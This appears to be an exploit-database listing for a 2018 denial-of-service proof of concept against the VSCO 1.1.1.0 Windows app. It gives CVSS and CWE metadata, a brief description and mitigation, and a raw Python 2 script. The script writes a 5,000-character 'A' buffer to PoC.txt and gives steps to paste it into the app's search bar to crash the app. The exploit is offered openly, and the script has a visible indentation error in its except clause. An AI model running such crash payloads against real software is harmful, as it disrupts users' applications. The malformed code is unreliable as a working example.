header-logo
Suggest Exploit
vendor:
VSCO
by:
0xB9
5.5
CVSS
MEDIUM
Denial of Service
400
CWE
Product Name: VSCO
Affected Version From: 1.1.1.0
Affected Version To: 1.1.1.0
Patch Exists: NO
Related CWE:
CPE: a:vsco:vsco:1.1.1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 10
2018

VSCO 1.1.1.0 – Denial of Service (PoC)

This exploit allows an attacker to cause a denial of service (DoS) by crashing the VSCO application. By creating a file with a large payload and pasting the contents into the search bar of the application, the app will crash.

Mitigation:

The vendor should release a patch or update that fixes the issue. Users should update their software to the latest version to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: VSCO 1.1.1.0 - Denial of Service (PoC)
# Date: 2/14/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NC1RLNH76PB
# Version: 1.1.1.0
# Tested on: Windows 10

# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the top right search bar and hit Search
# Click back to Home
# App will now crash

buffer = "A" * 5000
payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
print "File cannot be created"